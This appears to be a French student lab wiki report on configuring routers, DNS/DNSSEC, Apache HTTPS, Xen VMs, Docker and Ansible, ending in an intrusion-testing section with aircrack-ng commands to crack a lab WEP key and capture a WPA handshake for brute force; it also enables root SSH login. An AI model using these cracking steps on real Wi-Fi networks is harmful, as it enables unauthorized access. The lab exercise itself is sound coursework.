sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
